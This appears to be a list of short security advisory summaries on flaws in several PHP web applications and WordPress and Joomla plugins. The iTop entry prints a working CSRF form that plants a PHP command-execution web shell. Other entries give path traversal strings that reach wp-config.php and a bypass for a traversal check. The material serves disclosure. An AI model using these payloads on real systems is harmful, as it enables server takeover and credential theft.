Memphis Document Library 3.1.5 is vulnerable to arbitrary file download. The vulnerable file is mdocs-downloads.php and the vulnerable function is mdocs_img_preview(). The vulnerable GET parameter is injectable 'mdocs-img-preview'. The vulnerable code is from line 90 to 93. The POC is to use curl to download the file from the server. If the plugin is not installed in the root folder of wordpress, the POC is to use curl to download the file from the folder 'mdocs-posts'.
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'gateway' parameter of '/dharma-booking/frontend/ajax/gateways/proccess.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system.
The vulnerability occurs at the first lines of the file callback.php, where the user input is based on the $_REQUEST variable. An attacker can depending on the context, host on a malicious server a file called wp-load.php, and disable its execution using an htaccess, or abuse the null byte character ( %00, %2500 url-encoded).
Joomla Easy Youtube Gallery 1.0.2 is vulnerable to SQL injection. An attacker can inject malicious SQL code into the 'mycategory' parameter of the 'com_easy_youtube_gallery' component. This can be exploited to gain access to the underlying database and potentially gain access to sensitive information.
The vulnerability exists due to insufficient validation of user-supplied input in 'file_path' and 'file_size' parameters of '/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php' script. A remote attacker can download arbitrary files from the vulnerable system, which can lead to sensitive information disclosure.
ProjectSend is a self-hosted PHP based file-transfer platform. Several serious vulnerabilities have been discovered so far. Here are some further persistent and non-persistent XSS vulnerabilities which affect ProjectSend. Non-persistent XSS can be exploited by sending a malicious payload in the searchbox on my_files/index.php and as admin in searchboxes on 'Manage Clients', 'Clients groups' and 'System Users'.
High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via Cross-Site Request Forgery flaw that is also present in the application. The vulnerability exists due to absence of validation of HTTP request origin in "/env-production/itop-config/config.php" script, as well as lack of user-input sanitization received via "new_config" HTTP POST parameter. A remote unauthenticated attacker can perform CSRF attack and execute arbitrary PHP code on the vulnerable system with privileges of the web server. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary system commands on the web server, gain complete access to vulnerable web application and its databases that may contain very sensitive information. The attacker shall create a malicious web page with CSRF exploit code, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and permanently inject malicious PHP code into iTop configuration file. CSRF exploit will inject the following PHP code into iTop configuration file: <? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?> To reproduce the vulnerability, just create an empty HTML file and paste the following CSRF exploit cod into it: <html><body><form action="http://[host]/env-production/itop-config/config.php" method="POST"><input type="hidden" name="new_config" value="<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>" /><input type="submit" value="Submit request" /></form></body></html>
A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and change login, email address and password of the current website administrator.
The download.php file in the Wordpress image-export plugin is vulnerable to a Local File Disclosure vulnerability. An attacker can use the 'file' GET parameter to access any file on the server, including the Wordpress core. This can be exploited by sending a request to the download.php file with the 'file' parameter set to the path of the file to be accessed, such as '../../../wp-config.php'.
Xoops 2.5.7.2 has checks to defend against directory traversal attacks. However, they can be easily bypassed by simply issuing '..././' instead of '../'. The Xoops directory traversal check can be defeated by using '..././..././..././..././' to the GET param.
Services By CQR